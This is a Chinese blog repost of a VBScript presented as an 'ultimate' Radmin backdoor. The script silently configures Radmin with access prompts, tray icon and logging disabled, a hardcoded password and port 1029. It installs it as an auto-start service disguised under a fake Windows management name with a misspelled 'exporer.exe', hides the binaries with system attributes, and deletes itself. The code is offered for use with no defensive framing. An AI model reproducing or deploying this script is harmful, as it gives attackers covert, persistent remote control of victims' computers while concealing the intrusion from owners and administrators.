Vbs脚本实现radmin终极后门代码_删除自身
程序员文章站
2022-08-27 16:49:09
复制代码 代码如下:on error resume next const hkey_local_machine ...
复制代码 代码如下:
on error resume next
const hkey_local_machine = &h80000002
strcomputer = "."
set stdout = wscript.stdout
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &_
strcomputer & "\root\default:stdregprov")
strkeypath = "system\radmin"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server\iplist"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server\parameters"
oreg.createkey hkey_local_machine,strkeypath
set objregistry = getobject("winmgmts:root\default:stdregprov")
strpath = "system\radmin\v2.0\server\parameters"
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"askuser",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"autoallow",ubinary)
ubinary = array(1,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"disabletrayicon",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"enableeventlog",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"enablelogfile",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"filterip",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"ntauthenabled",ubinary)
ubinary = array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"parameter",ubinary) //radmin密码
ubinary = array(5,4,0,0) //端口:1029
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"port",ubinary)
ubinary = array(10,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"timeout",ubinary)
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &strcomputer &"\root\default:stdregprov")
strkeypath = "system\radmin\v2.0\server\parameters"
strvaluename = "logfilepath"
strvalue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create winmanagehelp binpath= %systemroot%\system32\exporer.exe start= auto",0)
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &strcomputer &"\root\default:stdregprov")
strkeypath = "system\controlset001\services\winmanagehelp"
strvaluename = "description"
strvalue = "windows media playerwindows management instrumentation player drivers."
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
strvaluename = "displayname"
strvalue = "windows management instrumentation player drivers"
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
strvaluename = "imagepath"
strvalue = "c:\windows\system32\exporer.exe /service"
oreg.setexpandedstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start winmanagehelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\admdll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
createobject("scripting.filesystemobject").deletefile(wscript.scriptname) //自删除
最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)
下一篇: vbs自动填表单分析附源码